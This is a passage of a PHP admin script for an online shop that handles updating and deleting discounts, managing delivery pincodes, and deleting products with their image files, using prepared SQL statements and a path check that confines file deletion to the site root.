        SET `code` = :code, 
            `description` = :description, 
            `discount_type` = :discount_type, 
            `discount_value` = :discount_value, 
            `min_order_value` = :min_order_value, 
            `max_discount` = :max_discount, 
            `usage_limit` = :usage_limit, 
            `start_date` = :start_date, 
            `end_date` = :end_date, 
            `status` = :status 
        WHERE `discount_id` = :discount_id");

    $stmt->execute([
        'code'            => $code,
        'description'     => $description,
        'discount_type'   => $discount_type,
        'discount_value'  => $discount_value,
        'min_order_value' => $min_order_value,
        'max_discount'    => $max_discount,
        'usage_limit'     => $usage_limit,
        'start_date'      => $start_date,
        'end_date'        => $end_date,
        'status'          => $status,
        'discount_id'     => $discount_id
    ]);

    header("Location: discount.php");
    exit();
}

//----------------------------------------------------------
// Delete Discount
//----------------------------------------------------------
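if (isset($_GET['action']) && $_GET['action'] === 'delete_discount') {
    // A missing discount_id becomes 0 (matches no row) instead of raising an undefined-key warning
    $discount_id = intval($_GET['discount_id'] ?? 0);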

    $stmt = $pdo->prepare("DELETE FROM `discounts` WHERE `discount_id` = :discount_id");
    $stmt->execute(['discount_id' => $discount_id]);

    header("Location: discount.php");
    exit();
}


//----------------------------------------------------------
// Add Pincode
//----------------------------------------------------------
if (isset($_POST['add_pincode'])) {
    $pincode        = !empty($_POST['pincode']) ? trim($_POST['pincode']) : "";
    $city           = !empty($_POST['city']) ? htmlspecialchars(trim($_POST['city'])) : "";
    $state          = !empty($_POST['state']) ? htmlspecialchars(trim($_POST['state'])) : "";
    $shipping_price = !empty($_POST['shipping_price']) ? floatval($_POST['shipping_price']) : 0.00;
    $cod_available  = !empty($_POST['cod_available']) ? $_POST['cod_available'] : "yes";
    $delivery_days  = !empty($_POST['delivery_days']) ? intval($_POST['delivery_days']) : 3;
    $status         = !empty($_POST['status']) ? $_POST['status'] : "active";

    $stmt = $pdo->prepare("INSERT INTO `pincodes` 
        (`pincode`, `city`, `state`, `shipping_price`, `cod_available`, `delivery_days`, `status`) 
        VALUES 
        (:pincode, :city, :state, :shipping_price, :cod_available, :delivery_days, :status)");

    $stmt->execute([
        'pincode'        => $pincode,
        'city'           => $city,
        'state'          => $state,
        'shipping_price' => $shipping_price,
        'cod_available'  => $cod_available,
        'delivery_days'  => $delivery_days,
        'status'         => $status
    ]);

    header("Location: pincodes.php");
    exit();
}

//----------------------------------------------------------
// Update Pincode
//----------------------------------------------------------
if (isset($_POST['update_pincode'])) {
    $pincode_id     = intval($_POST['pincode_id']);
    $pincode        = !empty($_POST['pincode']) ? trim($_POST['pincode']) : "";
    $city           = !empty($_POST['city']) ? htmlspecialchars(trim($_POST['city'])) : "";
    $state          = !empty($_POST['state']) ? htmlspecialchars(trim($_POST['state'])) : "";
    $shipping_price = !empty($_POST['shipping_price']) ? floatval($_POST['shipping_price']) : 0.00;
    $cod_available  = !empty($_POST['cod_available']) ? $_POST['cod_available'] : "yes";
    $delivery_days  = !empty($_POST['delivery_days']) ? intval($_POST['delivery_days']) : 3;
    $status         = !empty($_POST['status']) ? $_POST['status'] : "active";

    $stmt = $pdo->prepare("UPDATE `pincodes` 
        SET `pincode` = :pincode, 
            `city` = :city, 
            `state` = :state, 
            `shipping_price` = :shipping_price, 
            `cod_available` = :cod_available, 
            `delivery_days` = :delivery_days, 
            `status` = :status 
        WHERE `pincode_id` = :pincode_id");

    $stmt->execute([
        'pincode'        => $pincode,
        'city'           => $city,
        'state'          => $state,
        'shipping_price' => $shipping_price,
        'cod_available'  => $cod_available,
        'delivery_days'  => $delivery_days,
        'status'         => $status,
        'pincode_id'     => $pincode_id
    ]);

    header("Location: pincodes.php");
    exit();
}

//----------------------------------------------------------
// Delete Pincode
//----------------------------------------------------------
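if (isset($_GET['action']) && $_GET['action'] === 'delete_pincode') {
    // A missing pincode_id becomes 0 (matches no row) instead of raising an undefined-key warning
    $pincode_id = intval($_GET['pincode_id'] ?? 0);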

    $stmt = $pdo->prepare("DELETE FROM `pincodes` WHERE `pincode_id` = :pincode_id");
    $stmt->execute(['pincode_id' => $pincode_id]);

    header("Location: pincodes.php");
    exit();
}





//----------------------------------------------------------
// Delete product
//----------------------------------------------------------
if (isset($_GET['action']) && $_GET['action'] === 'delete_product') {
    // A missing id becomes 0 (matches no row) instead of raising an undefined-key warning
    $id = intval($_GET['id'] ?? 0);

    // Fetch product images
    $stmt = $pdo->prepare("SELECT `thumbnail_image`, `product_images` FROM `products` WHERE `product_id` = :id");
    $stmt->execute(['id' => $id]);
    $product = $stmt->fetch(PDO::FETCH_ASSOC);

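    if ($product) {
        // Stored paths are deleted only when they resolve to a regular file inside the
        // site root ("../"), so a stored value containing "../" sequences cannot remove
        // files outside it.
        $base_dir = realpath("../");
        $paths    = [];

        // Thumbnail image
        if (!empty($product['thumbnail_image'])) {
            $paths[] = $product['thumbnail_image'];
        }

        // Multiple product images (JSON array)
        if (!empty($product['product_images'])) {
            $images = json_decode($product['product_images'], true);
            if (is_array($images)) {
                $paths = array_merge($paths, $images);
            }
        }

        foreach ($paths as $img) {
            // Non-string entries (e.g. nested arrays in the JSON) are skipped
            $real = is_string($img) ? realpath("../" . $img) : false;
            if ($base_dir !== false && $real !== false && is_file($real)
                && strpos($real, $base_dir . DIRECTORY_SEPARATOR) === 0) {
                unlink($real);
            }
        }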

        // Delete product record from database
        $stmt = $pdo->prepare("DELETE FROM `products` WHERE `product_id` = :id");
        $stmt->execute(['id' => $id]);
    }

    // Redirect back to products page
    header("Location: product.php");
    exit();
}

?>
